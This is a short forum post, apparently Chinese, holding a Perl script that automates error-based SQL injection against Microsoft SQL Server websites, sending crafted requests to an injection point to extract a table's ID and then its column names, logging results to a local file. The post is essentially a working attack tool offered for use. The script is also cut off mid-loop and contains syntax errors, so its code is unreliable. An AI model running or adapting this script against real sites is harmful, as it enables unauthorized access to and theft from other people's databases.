perl在mssql注入中爆表列
#!/usr/bin/perl -w #Codz By N3tl04D#Date 2008-4-13
use strict;
use LWP;
if(@ARGV != 2){
print "用法:$0 注入点 表名";
exit;
}
my $browser;
my $start=time();
my $talbe=$ARGV;
my $vul=$ARGV;
sub do_GET {
$browser = LWP::UserAgent->new unless $browser;
my $resp = $browser->get(@_);
return ($resp->content, $resp->status_line, $resp->is_success, $resp)
if wantarray;
return unless $resp->is_success;
return $resp->content;
}
my $tabl="$vul%20and%200(select%20count(*)%20from%20congaltan.dbo.sysobjects%20where%20xtype='u'%20and%20name='".$talbe."'%20and%20uid>(str(id)))";
my ($content, $status, $is_success) = do_GET($tabl);
if ($content =~ m{value \'(.+?)\'}gi)
{
print "得到表ID:$1\n";
open(FILE,">>e:/perl/count.txt") || die ("Could not open file");
print FILE "===============================================================\n表名:$talbe> close(FILE);
crake($1);
} else {
print "不能爆表\n";
last;
}
sub crake {
my @arr1=();
for (my $j=1;$j
页:
[1]